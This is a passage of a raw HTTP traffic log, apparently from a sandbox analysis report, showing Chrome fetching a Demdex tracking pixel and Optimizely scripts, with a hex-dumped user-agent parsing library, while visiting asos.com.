                                                                                                                                                                                                                                                                                      2024-10-24 22:07:35 UTC1369INData Raw: 6f 75 79 61 29 2f 69 2c 2f 28 6e 69 6e 74 65 6e 64 6f 29 20 28 5b 77 69 64 73 33 75 74 63 68 5d 2b 29 2f 69 5d 2c 5b 76 2c 66 2c 5b 64 2c 67 5d 5d 2c 5b 2f 64 72 6f 69 64 2e 2b 3b 20 28 73 68 69 65 6c 64 29 20 62 75 69 2f 69 5d 2c 5b 66 2c 5b 76 2c 22 4e 76 69 64 69 61 22 5d 2c 5b 64 2c 67 5d 5d 2c 5b 2f 28 70 6c 61 79 73 74 61 74 69 6f 6e 20 5b 33 34 35 70 6f 72 74 61 62 6c 65 76 69 5d 2b 29 2f 69 5d 2c 5b 66 2c 5b 76 2c 50 5d 2c 5b 64 2c 67 5d 5d 2c 5b 2f 5c 62 28 78 62 6f 78 28 3f 3a 20 6f 6e 65 29 3f 28 3f 21 3b 20 78 62 6f 78 29 29 5b 5c 29 3b 20 5d 2f 69 5d 2c 5b 66 2c 5b 76 2c 4e 5d 2c 5b 64 2c 67 5d 5d 2c 5b 2f 28 28 70 65 62 62 6c 65 29 29 61 70 70 2f 69 5d 2c 5b 76 2c 66 2c 5b 64 2c 79 5d 5d 2c 5b 2f 64 72 6f 69 64 2e 2b 3b 20 28 67 6c 61 73 73
                                                                                                                                                                                                                                                                                      Data Ascii: ouya)/i,/(nintendo) ([wids3utch]+)/i],[v,f,[d,g]],[/droid.+; (shield) bui/i],[f,[v,"Nvidia"],[d,g]],[/(playstation [345portablevi]+)/i],[f,[v,P],[d,g]],[/\b(xbox(?: one)?(?!; xbox))[\); ]/i],[f,[v,N],[d,g]],[/((pebble))app/i],[v,f,[d,y]],[/droid.+; (glass


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      62192.168.2.164990652.17.200.404436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:35 UTC473OUTGET /ibs:dpid=411&dpuuid=ZxrFJQAAAFqFsAN- HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: dpm.demdex.net
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      Cookie: demdex=16215612898763276402808192961366232505; dpm=16215612898763276402808192961366232505
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:36 UTC891INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:07:36 GMT
                                                                                                                                                                                                                                                                                      Content-Type: image/gif
                                                                                                                                                                                                                                                                                      Content-Length: 42
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      X-TID: LNkwBwGuQms=
                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                                                                                                                                                      P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      DCS: dcs-prod-irl1-2-v067-045b3c43c.edge-irl1.demdex.com 2 ms
                                                                                                                                                                                                                                                                                      set-cookie: dpm=16215612898763276402808192961366232505; Max-Age=15552000; Expires=Tue, 22 Apr 2025 22:07:36 GMT; Path=/; Domain=.dpm.demdex.net; Secure; SameSite=None
                                                                                                                                                                                                                                                                                      set-cookie: demdex=16215612898763276402808192961366232505; Max-Age=15552000; Expires=Tue, 22 Apr 2025 22:07:36 GMT; Path=/; Domain=.demdex.net; Secure; SameSite=None
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:36 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                                                                                                                      Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      63192.168.2.1649913104.18.66.574436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:37 UTC359OUTGET /js/19181552552.js HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: cdn.optimizely.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:38 UTC912INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:07:38 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      x-amz-id-2: AJpeHwwnTlesAUV0jG/iimpFAf3wk4SG3FQ9VWdF/mA82TF+ESjHtfnmLx21AczbcRvJ87HGXUA=
                                                                                                                                                                                                                                                                                      x-amz-request-id: KBVHJYZ1XSD4PH2Q
                                                                                                                                                                                                                                                                                      x-amz-replication-status: PENDING
                                                                                                                                                                                                                                                                                      Last-Modified: Thu, 24 Oct 2024 10:45:21 GMT
                                                                                                                                                                                                                                                                                      ETag: W/"71f21737a383c3ed84dfaea4ba05a736"
                                                                                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                      Cache-Control: max-age=120
                                                                                                                                                                                                                                                                                      x-amz-meta-revision: 72943
                                                                                                                                                                                                                                                                                      x-amz-meta-pci_enabled: False
                                                                                                                                                                                                                                                                                      x-amz-version-id: BiMrJGRF4C3FwxFdnK0uSmJl4bDUmafF
                                                                                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                      Age: 69
                                                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                                      Access-Control-Expose-Headers: x-amz-meta-revision
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: false
                                                                                                                                                                                                                                                                                      Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d47e6ec556c26-DFW
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:38 UTC457INData Raw: 37 63 30 38 0d 0a 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 63 6c 69 65 6e 74 2e 6d 69 6e 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 5f 77 65 62 70 61 63 6b 5f 6d 6f 64 75 6c 65 73 5f 5f 3d 7b 35 32 35 31 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 65 29 7b 76 61 72 20 69 3b 21 66 75 6e 63 74 69 6f 6e 28 72 2c 6f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 61 3d 22 66 75 6e 63 74 69 6f 6e 22 2c 75 3d 22 75 6e 64 65 66 69 6e 65 64 22 2c 63 3d 22 6f 62 6a 65 63 74 22 2c 73 3d 22 73 74 72 69 6e 67 22 2c 66 3d 22 6d 6f 64 65 6c 22 2c 6c 3d 22 6e 61 6d 65 22 2c 64 3d 22 74 79 70 65 22 2c 76 3d 22 76 65 6e 64 6f
                                                                                                                                                                                                                                                                                      Data Ascii: 7c08/*! For license information please see client.min.js.LICENSE.txt */(function(){var __webpack_modules__={5251:function(t,n,e){var i;!function(r,o){"use strict";var a="function",u="undefined",c="object",s="string",f="model",l="name",d="type",v="vendo
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:38 UTC1369INData Raw: 22 2c 44 3d 22 4d 6f 74 6f 72 6f 6c 61 22 2c 4f 3d 22 4f 70 65 72 61 22 2c 78 3d 22 53 61 6d 73 75 6e 67 22 2c 4d 3d 22 53 68 61 72 70 22 2c 50 3d 22 53 6f 6e 79 22 2c 4c 3d 22 58 69 61 6f 6d 69 22 2c 55 3d 22 5a 65 62 72 61 22 2c 56 3d 22 46 61 63 65 62 6f 6f 6b 22 2c 46 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 7b 7d 2c 65 3d 30 3b 65 3c 74 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 6e 5b 74 5b 65 5d 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 5d 3d 74 5b 65 5d 3b 72 65 74 75 72 6e 20 6e 7d 2c 42 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 74 3d 3d 3d 73 26 26 2d 31 21 3d 3d 7a 28 6e 29 2e 69 6e 64 65 78 4f 66 28 7a 28 74 29 29 7d 2c 7a 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e
                                                                                                                                                                                                                                                                                      Data Ascii: ",D="Motorola",O="Opera",x="Samsung",M="Sharp",P="Sony",L="Xiaomi",U="Zebra",V="Facebook",F=function(t){for(var n={},e=0;e<t.length;e++)n[t[e].toUpperCase()]=t[e];return n},B=function(t,n){return typeof t===s&&-1!==z(n).indexOf(z(t))},z=function(t){return
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:38 UTC1369INData Raw: 5c 2f 28 5b 2d 5c 77 5c 2e 5d 2b 29 2f 69 2c 2f 28 6f 70 65 72 61 29 28 3f 3a 2e 2b 76 65 72 73 69 6f 6e 5c 2f 7c 5b 5c 2f 20 5d 2b 29 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 6c 2c 68 5d 2c 5b 2f 6f 70 69 6f 73 5b 5c 2f 20 5d 2b 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 68 2c 5b 6c 2c 22 4f 70 65 72 61 20 4d 69 6e 69 22 5d 5d 2c 5b 2f 5c 62 6f 70 72 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 68 2c 5b 6c 2c 4f 5d 5d 2c 5b 2f 28 6b 69 6e 64 6c 65 29 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 2c 2f 28 6c 75 6e 61 73 63 61 70 65 7c 6d 61 78 74 68 6f 6e 7c 6e 65 74 66 72 6f 6e 74 7c 6a 61 73 6d 69 6e 65 7c 62 6c 61 7a 65 72 29 5b 5c 2f 20 5d 3f 28 5b 5c 77 5c 2e 5d 2a 29 2f 69 2c 2f 28 61 76 61 6e 74 20 7c 69 65 6d 6f 62 69 6c 65 7c 73 6c 69 6d 29 28 3f 3a
                                                                                                                                                                                                                                                                                      Data Ascii: \/([-\w\.]+)/i,/(opera)(?:.+version\/|[\/ ]+)([\w\.]+)/i],[l,h],[/opios[\/ ]+([\w\.]+)/i],[h,[l,"Opera Mini"]],[/\bopr\/([\w\.]+)/i],[h,[l,O]],[/(kindle)\/([\w\.]+)/i,/(lunascape|maxthon|netfront|jasmine|blazer)[\/ ]?([\w\.]*)/i,/(avant |iemobile|slim)(?:
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:38 UTC1369INData Raw: 6c 75 73 7c 73 61 6d 73 75 6e 67 7c 73 61 69 6c 66 69 73 68 7c 68 75 61 77 65 69 29 62 72 6f 77 73 65 72 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 5b 6c 2c 2f 28 2e 2b 29 2f 2c 22 24 31 20 42 72 6f 77 73 65 72 22 5d 2c 68 5d 2c 5b 2f 28 63 6f 6d 6f 64 6f 5f 64 72 61 67 6f 6e 29 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 5b 6c 2c 2f 5f 2f 67 2c 22 20 22 5d 2c 68 5d 2c 5b 2f 28 65 6c 65 63 74 72 6f 6e 29 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 20 73 61 66 61 72 69 2f 69 2c 2f 28 74 65 73 6c 61 29 28 3f 3a 20 71 74 63 61 72 62 72 6f 77 73 65 72 7c 5c 2f 28 32 30 5c 64 5c 64 5c 2e 5b 2d 5c 77 5c 2e 5d 2b 29 29 2f 69 2c 2f 6d 3f 28 71 71 62 72 6f 77 73 65 72 7c 62 61 69 64 75 62 6f 78 61 70 70 7c 32 33 34 35 45 78 70 6c 6f 72 65 72 29 5b 5c 2f 20 5d 3f 28
                                                                                                                                                                                                                                                                                      Data Ascii: lus|samsung|sailfish|huawei)browser\/([\w\.]+)/i],[[l,/(.+)/,"$1 Browser"],h],[/(comodo_dragon)\/([\w\.]+)/i],[[l,/_/g," "],h],[/(electron)\/([\w\.]+) safari/i,/(tesla)(?: qtcarbrowser|\/(20\d\d\.[-\w\.]+))/i,/m?(qqbrowser|baiduboxapp|2345Explorer)[\/ ]?(
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:38 UTC1369INData Raw: 2f 65 6b 69 6f 68 66 2e 2b 28 66 6c 6f 77 29 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 2c 2f 28 73 77 69 66 74 66 6f 78 29 2f 69 2c 2f 28 69 63 65 64 72 61 67 6f 6e 7c 69 63 65 77 65 61 73 65 6c 7c 63 61 6d 69 6e 6f 7c 63 68 69 6d 65 72 61 7c 66 65 6e 6e 65 63 7c 6d 61 65 6d 6f 20 62 72 6f 77 73 65 72 7c 6d 69 6e 69 6d 6f 7c 63 6f 6e 6b 65 72 6f 72 7c 6b 6c 61 72 29 5b 5c 2f 20 5d 3f 28 5b 5c 77 5c 2e 5c 2b 5d 2b 29 2f 69 2c 2f 28 73 65 61 6d 6f 6e 6b 65 79 7c 6b 2d 6d 65 6c 65 6f 6e 7c 69 63 65 63 61 74 7c 69 63 65 61 70 65 7c 66 69 72 65 62 69 72 64 7c 70 68 6f 65 6e 69 78 7c 70 61 6c 65 6d 6f 6f 6e 7c 62 61 73 69 6c 69 73 6b 7c 77 61 74 65 72 66 6f 78 29 5c 2f 28 5b 2d 5c 77 5c 2e 5d 2b 29 24 2f 69 2c 2f 28 66 69 72 65 66 6f 78 29 5c 2f 28 5b 5c 77 5c 2e
                                                                                                                                                                                                                                                                                      Data Ascii: /ekiohf.+(flow)\/([\w\.]+)/i,/(swiftfox)/i,/(icedragon|iceweasel|camino|chimera|fennec|maemo browser|minimo|conkeror|klar)[\/ ]?([\w\.\+]+)/i,/(seamonkey|k-meleon|icecat|iceape|firebird|phoenix|palemoon|basilisk|waterfox)\/([-\w\.]+)$/i,/(firefox)\/([\w\.
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:38 UTC1369INData Raw: 28 69 70 61 64 29 5c 64 5c 64 3f 2c 5c 64 5c 64 3f 5b 3b 5c 5d 5d 2e 2b 69 6f 73 2f 69 5d 2c 5b 66 2c 5b 76 2c 49 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 28 6d 61 63 69 6e 74 6f 73 68 29 3b 2f 69 5d 2c 5b 66 2c 5b 76 2c 49 5d 5d 2c 5b 2f 5c 62 28 73 68 2d 3f 5b 61 6c 74 76 7a 5d 3f 5c 64 5c 64 5b 61 2d 65 6b 6d 5d 3f 29 2f 69 5d 2c 5b 66 2c 5b 76 2c 4d 5d 2c 5b 64 2c 6d 5d 5d 2c 5b 2f 5c 62 28 28 3f 3a 61 67 5b 72 73 5d 5b 32 33 5d 3f 7c 62 61 68 32 3f 7c 73 68 74 3f 7c 62 74 76 29 2d 61 3f 5b 6c 77 5d 5c 64 7b 32 7d 29 5c 62 28 3f 21 2e 2b 64 5c 2f 73 29 2f 69 5d 2c 5b 66 2c 5b 76 2c 52 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 28 3f 3a 68 75 61 77 65 69 7c 68 6f 6e 6f 72 29 28 5b 2d 5c 77 20 5d 2b 29 5b 3b 5c 29 5d 2f 69 2c 2f 5c 62 28 6e 65 78 75 73 20 36 70 7c 5c 77
                                                                                                                                                                                                                                                                                      Data Ascii: (ipad)\d\d?,\d\d?[;\]].+ios/i],[f,[v,I],[d,_]],[/(macintosh);/i],[f,[v,I]],[/\b(sh-?[altvz]?\d\d[a-ekm]?)/i],[f,[v,M],[d,m]],[/\b((?:ag[rs][23]?|bah2?|sht?|btv)-a?[lw]\d{2})\b(?!.+d\/s)/i],[f,[v,R],[d,_]],[/(?:huawei|honor)([-\w ]+)[;\)]/i,/\b(nexus 6p|\w
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:38 UTC1369INData Raw: 69 2f 69 5d 2c 5b 66 2c 5b 76 2c 43 5d 2c 5b 64 2c 6d 5d 5d 2c 5b 2f 28 69 64 65 61 74 61 62 5b 2d 5c 77 20 5d 2b 29 2f 69 2c 2f 6c 65 6e 6f 76 6f 20 3f 28 73 5b 35 36 5d 30 30 30 5b 2d 5c 77 5d 2b 7c 74 61 62 28 3f 3a 5b 5c 77 20 5d 2b 29 7c 79 74 5b 2d 5c 64 5c 77 5d 7b 36 7d 7c 74 62 5b 2d 5c 64 5c 77 5d 7b 36 7d 29 2f 69 5d 2c 5b 66 2c 5b 76 2c 22 4c 65 6e 6f 76 6f 22 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 28 3f 3a 6d 61 65 6d 6f 7c 6e 6f 6b 69 61 29 2e 2a 28 6e 39 30 30 7c 6c 75 6d 69 61 20 5c 64 2b 29 2f 69 2c 2f 6e 6f 6b 69 61 5b 2d 5f 20 5d 3f 28 5b 2d 5c 77 5c 2e 5d 2a 29 2f 69 5d 2c 5b 5b 66 2c 2f 5f 2f 67 2c 22 20 22 5d 2c 5b 76 2c 22 4e 6f 6b 69 61 22 5d 2c 5b 64 2c 6d 5d 5d 2c 5b 2f 28 70 69 78 65 6c 20 63 29 5c 62 2f 69 5d 2c 5b 66 2c 5b 76 2c 6b
                                                                                                                                                                                                                                                                                      Data Ascii: i/i],[f,[v,C],[d,m]],[/(ideatab[-\w ]+)/i,/lenovo ?(s[56]000[-\w]+|tab(?:[\w ]+)|yt[-\d\w]{6}|tb[-\d\w]{6})/i],[f,[v,"Lenovo"],[d,_]],[/(?:maemo|nokia).*(n900|lumia \d+)/i,/nokia[-_ ]?([-\w\.]*)/i],[[f,/_/g," "],[v,"Nokia"],[d,m]],[/(pixel c)\b/i],[f,[v,k
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:38 UTC1369INData Raw: 2c 22 41 63 65 72 22 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 64 72 6f 69 64 2e 2b 3b 20 28 6d 5b 31 2d 35 5d 20 6e 6f 74 65 29 20 62 75 69 2f 69 2c 2f 5c 62 6d 7a 2d 28 5b 2d 5c 77 5d 7b 32 2c 7d 29 2f 69 5d 2c 5b 66 2c 5b 76 2c 22 4d 65 69 7a 75 22 5d 2c 5b 64 2c 6d 5d 5d 2c 5b 2f 28 62 6c 61 63 6b 62 65 72 72 79 7c 62 65 6e 71 7c 70 61 6c 6d 28 3f 3d 5c 2d 29 7c 73 6f 6e 79 65 72 69 63 73 73 6f 6e 7c 61 63 65 72 7c 61 73 75 73 7c 64 65 6c 6c 7c 6d 65 69 7a 75 7c 6d 6f 74 6f 72 6f 6c 61 7c 70 6f 6c 79 74 72 6f 6e 29 5b 2d 5f 20 5d 3f 28 5b 2d 5c 77 5d 2a 29 2f 69 2c 2f 28 68 70 29 20 28 5b 5c 77 20 5d 2b 5c 77 29 2f 69 2c 2f 28 61 73 75 73 29 2d 3f 28 5c 77 2b 29 2f 69 2c 2f 28 6d 69 63 72 6f 73 6f 66 74 29 3b 20 28 6c 75 6d 69 61 5b 5c 77 20 5d 2b 29 2f 69 2c
                                                                                                                                                                                                                                                                                      Data Ascii: ,"Acer"],[d,_]],[/droid.+; (m[1-5] note) bui/i,/\bmz-([-\w]{2,})/i],[f,[v,"Meizu"],[d,m]],[/(blackberry|benq|palm(?=\-)|sonyericsson|acer|asus|dell|meizu|motorola|polytron)[-_ ]?([-\w]*)/i,/(hp) ([\w ]+\w)/i,/(asus)-?(\w+)/i,/(microsoft); (lumia[\w ]+)/i,
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:38 UTC1369INData Raw: 5d 2c 66 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 5c 62 28 6e 73 2d 3f 5c 77 7b 30 2c 39 7d 29 20 62 2f 69 5d 2c 5b 66 2c 5b 76 2c 22 49 6e 73 69 67 6e 69 61 22 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 5c 62 28 28 6e 78 61 7c 6e 65 78 74 29 2d 3f 5c 77 7b 30 2c 39 7d 29 20 62 2f 69 5d 2c 5b 66 2c 5b 76 2c 22 4e 65 78 74 42 6f 6f 6b 22 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 5c 62 28 78 74 72 65 6d 65 5c 5f 29 3f 28 76 28 31 5b 30 34 35 5d 7c 32 5b 30 31 35 5d 7c 5b 33 34 36 39 5d 30 7c 37 5b 30 35 5d 29 29 20 62 2f 69 5d 2c 5b 5b 76 2c 22 56 6f 69 63 65 22 5d 2c 66 2c 5b 64 2c 6d 5d 5d 2c 5b 2f 5c 62 28 6c 76 74 65 6c 5c 2d 29 3f 28 76 31 5b 31 32 5d 29 20 62 2f 69 5d 2c 5b 5b 76 2c 22 4c 76 54 65 6c 22 5d 2c 66 2c 5b 64 2c 6d 5d 5d 2c 5b 2f 5c 62 28 70 68 2d 31 29 20 2f 69 5d 2c
                                                                                                                                                                                                                                                                                      Data Ascii: ],f,[d,_]],[/\b(ns-?\w{0,9}) b/i],[f,[v,"Insignia"],[d,_]],[/\b((nxa|next)-?\w{0,9}) b/i],[f,[v,"NextBook"],[d,_]],[/\b(xtreme\_)?(v(1[045]|2[015]|[3469]0|7[05])) b/i],[[v,"Voice"],f,[d,m]],[/\b(lvtel\-)?(v1[12]) b/i],[[v,"LvTel"],f,[d,m]],[/\b(ph-1) /i],
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:38 UTC1369INData Raw: 6f 75 79 61 29 2f 69 2c 2f 28 6e 69 6e 74 65 6e 64 6f 29 20 28 5b 77 69 64 73 33 75 74 63 68 5d 2b 29 2f 69 5d 2c 5b 76 2c 66 2c 5b 64 2c 67 5d 5d 2c 5b 2f 64 72 6f 69 64 2e 2b 3b 20 28 73 68 69 65 6c 64 29 20 62 75 69 2f 69 5d 2c 5b 66 2c 5b 76 2c 22 4e 76 69 64 69 61 22 5d 2c 5b 64 2c 67 5d 5d 2c 5b 2f 28 70 6c 61 79 73 74 61 74 69 6f 6e 20 5b 33 34 35 70 6f 72 74 61 62 6c 65 76 69 5d 2b 29 2f 69 5d 2c 5b 66 2c 5b 76 2c 50 5d 2c 5b 64 2c 67 5d 5d 2c 5b 2f 5c 62 28 78 62 6f 78 28 3f 3a 20 6f 6e 65 29 3f 28 3f 21 3b 20 78 62 6f 78 29 29 5b 5c 29 3b 20 5d 2f 69 5d 2c 5b 66 2c 5b 76 2c 4e 5d 2c 5b 64 2c 67 5d 5d 2c 5b 2f 28 28 70 65 62 62 6c 65 29 29 61 70 70 2f 69 5d 2c 5b 76 2c 66 2c 5b 64 2c 79 5d 5d 2c 5b 2f 64 72 6f 69 64 2e 2b 3b 20 28 67 6c 61 73 73
                                                                                                                                                                                                                                                                                      Data Ascii: ouya)/i,/(nintendo) ([wids3utch]+)/i],[v,f,[d,g]],[/droid.+; (shield) bui/i],[f,[v,"Nvidia"],[d,g]],[/(playstation [345portablevi]+)/i],[f,[v,P],[d,g]],[/\b(xbox(?: one)?(?!; xbox))[\); ]/i],[f,[v,N],[d,g]],[/((pebble))app/i],[v,f,[d,y]],[/droid.+; (glass


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      64192.168.2.1649916104.18.66.574436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:38 UTC722OUTGET /client_storage/a19065870423.html HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: a19065870423.cdn.optimizely.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                                      Referer: https://www.asos.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:38 UTC624INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:07:38 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      CF-Ray: 8d7d47e79c9be836-DFW
                                                                                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                      Age: 127
                                                                                                                                                                                                                                                                                      Cache-Control: max-age=120
                                                                                                                                                                                                                                                                                      Last-Modified: Thu, 24 Oct 2024 10:45:05 GMT
                                                                                                                                                                                                                                                                                      x-amz-id-2: 8g+Re6utLuCKNAjYNYz996JF9CAQGnf1m2HJUh/6uX4xF3TNkatl04emZnJKyIcpbY5jNHayoVg=
                                                                                                                                                                                                                                                                                      x-amz-meta-pci_enabled: False
                                                                                                                                                                                                                                                                                      x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                                      x-amz-request-id: XV50QXHEQDK306WZ
                                                                                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                      x-amz-version-id: T40RWwScBuLHLg3xZd8KO5CwjoXUhkMF
                                                                                                                                                                                                                                                                                      Server-Timing: cfCacheStatus;desc="HIT"
                                                                                                                                                                                                                                                                                      Server: cloudflare
